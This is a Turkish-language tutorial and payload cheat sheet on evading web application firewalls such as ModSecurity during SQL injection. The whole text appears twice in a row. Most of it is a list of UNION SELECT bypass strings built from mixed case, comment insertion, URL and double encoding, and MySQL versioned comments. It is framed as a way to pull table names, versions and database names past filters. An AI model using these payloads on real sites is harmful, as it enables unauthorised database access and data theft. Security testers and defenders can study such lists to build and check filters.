WAF ((W)eb (A)pplication (F)irewall) Injection
SQL Injection yaptığımız zaman genellikle kolon sayılarını, tablo isimlerini, versiyon numarasını, database ismini vb. gibi bilgileri ekrana yansıtamayız. İşte bunun sebebi Firewall yani Güvenlik Duvarının engellemesinden kaynaklıdır. İşte bu yüzden komutlarımızı büyük-küçük veya kimi zaman bazı işaretler bırakarak Güvenlik Duvarını (Firewall) korumasını atlamaya yani bu savunmayı geçmeye çalışırız. İşte bu aşağıdaki komutlar Güvenlik Duvarını (Firewall)'i geçmemiz için çeşitli komutlardır. Tüm komutlar aynı işlevi görmektedir.
Örneğin: union+select ile (UnIoN)+(SelECT) komutları aynı işlevi görmektedir.
Peki şöyle sorabilirsiniz: "Aynı işlevi görüyor ise neden o zaman iki komutu paylaşıyorsun?" diye sorabilirsiniz.
Güvenlik Duvarını (Firewall)'i geçmek için bu komutları büyük-küçük, kimi zaman parantez içine kimi zaman da özel işaretler kullanırız ve Güvenlik Duvarını yani Firewall'i geçmiş oluruz. Bunun sonucunda da kolon sayısını, tablo isimlerini, versiyon numarasını veya ki database ismini ekrana yansıtabiliriz.
Bu veya birçok Firewall Bypass Etme Yöntemleri vardır. Bu yöntemler ile de Güvenlik Duvarını yani Firewall'i geçebilirsiniz.
Not: Güvenlik Duvarını (Firewall)'i geçmek için çeşitli yöntemler vardır. Birinci komut işinizi görmeyebilir. Diğer komutları denersiniz elbette ki sonucunda bir komutla Güvenlik Duvarını (Firewall)'i atlatacaksınız ve bu yöntem sayesinde ekrana yansıtmak istediğiniz bilgilere ulaşabilirsiniz.
Bu durum genellikle: Not Found, Not Found 404, Not Found 406, Not Found Mod Security vs. gibi durumları aşmak içindir.
Atlayarak Bypass Yöntemleri;
1. id=1+(UnIoN)+(SelECT)+
2. id=1+(UnIoN+SeLeCT)+
3. id=1+(UnI)(oN)+(SeL)(EcT)
4. id=1+’UnI”On’+’SeL”ECT’
5. id=1+%55nion all /*!12345%53elect*/ 1,version(),3—
6. id=1+UnIoN+SeLecT 1,2,3—
7. id=1+UnIOn/**/SeLect 1,2,3—
8. id=1+UNIunionON+SELselectECT 1,2,3—
9. id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3—
10. id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3—
11. id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1,2 ,3—
12. id=1+un/**/ion+sel/**/ect+1,2,3–
13. id=1+/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3
14. id=1+/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table–
15. id=1+/**/union/*&id=*/select/*&id=*/1,2,3–
union+select seçerek Bypass Atlamak;
union(select(0),version(),(0),(0),(0),(0),( 0),(0),(0))
/*!50000union*/+/*!50000select*/
UNIunionON+SELselectECT
+union+distinct+select+
+union+distinctROW+select+
union+/*!select*/+1,2,3
union/**/select/**/1,2,3
uni%20union%20/*!select*/%20
/**//*!union*//**//*!select*//**/
union%23aa%0Aselect
/**/union/*!50000select*/
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
id=1+’UnI”On’+’SeL”ECT’ <-MySQL only
id=1+’UnI’||’on’+SeLeCT’ <-MSSQL only
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)
SQL Injection yaptığımız zaman genellikle kolon sayılarını, tablo isimlerini, versiyon numarasını, database ismini vb. gibi bilgileri ekrana yansıtamayız. İşte bunun sebebi Firewall yani Güvenlik Duvarının engellemesinden kaynaklıdır. İşte bu yüzden komutlarımızı büyük-küçük veya kimi zaman bazı işaretler bırakarak Güvenlik Duvarını (Firewall) korumasını atlamaya yani bu savunmayı geçmeye çalışırız. İşte bu aşağıdaki komutlar Güvenlik Duvarını (Firewall)'i geçmemiz için çeşitli komutlardır. Tüm komutlar aynı işlevi görmektedir.
Örneğin: union+select ile (UnIoN)+(SelECT) komutları aynı işlevi görmektedir.
Peki şöyle sorabilirsiniz: "Aynı işlevi görüyor ise neden o zaman iki komutu paylaşıyorsun?" diye sorabilirsiniz.
Güvenlik Duvarını (Firewall)'i geçmek için bu komutları büyük-küçük, kimi zaman parantez içine kimi zaman da özel işaretler kullanırız ve Güvenlik Duvarını yani Firewall'i geçmiş oluruz. Bunun sonucunda da kolon sayısını, tablo isimlerini, versiyon numarasını veya ki database ismini ekrana yansıtabiliriz.
Bu veya birçok Firewall Bypass Etme Yöntemleri vardır. Bu yöntemler ile de Güvenlik Duvarını yani Firewall'i geçebilirsiniz.
Not: Güvenlik Duvarını (Firewall)'i geçmek için çeşitli yöntemler vardır. Birinci komut işinizi görmeyebilir. Diğer komutları denersiniz elbette ki sonucunda bir komutla Güvenlik Duvarını (Firewall)'i atlatacaksınız ve bu yöntem sayesinde ekrana yansıtmak istediğiniz bilgilere ulaşabilirsiniz.
Bu durum genellikle: Not Found, Not Found 404, Not Found 406, Not Found Mod Security vs. gibi durumları aşmak içindir.
Atlayarak Bypass Yöntemleri;
1. id=1+(UnIoN)+(SelECT)+
2. id=1+(UnIoN+SeLeCT)+
3. id=1+(UnI)(oN)+(SeL)(EcT)
4. id=1+’UnI”On’+’SeL”ECT’
5. id=1+%55nion all /*!12345%53elect*/ 1,version(),3—
6. id=1+UnIoN+SeLecT 1,2,3—
7. id=1+UnIOn/**/SeLect 1,2,3—
8. id=1+UNIunionON+SELselectECT 1,2,3—
9. id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3—
10. id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3—
11. id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1,2 ,3—
12. id=1+un/**/ion+sel/**/ect+1,2,3–
13. id=1+/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3
14. id=1+/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table–
15. id=1+/**/union/*&id=*/select/*&id=*/1,2,3–
union+select seçerek Bypass Atlamak;
union(select(0),version(),(0),(0),(0),(0),( 0),(0),(0))
/*!50000union*/+/*!50000select*/
UNIunionON+SELselectECT
+union+distinct+select+
+union+distinctROW+select+
union+/*!select*/+1,2,3
union/**/select/**/1,2,3
uni%20union%20/*!select*/%20
/**//*!union*//**//*!select*//**/
union%23aa%0Aselect
/**/union/*!50000select*/
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
id=1+’UnI”On’+’SeL”ECT’ <-MySQL only
id=1+’UnI’||’on’+SeLeCT’ <-MSSQL only
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)
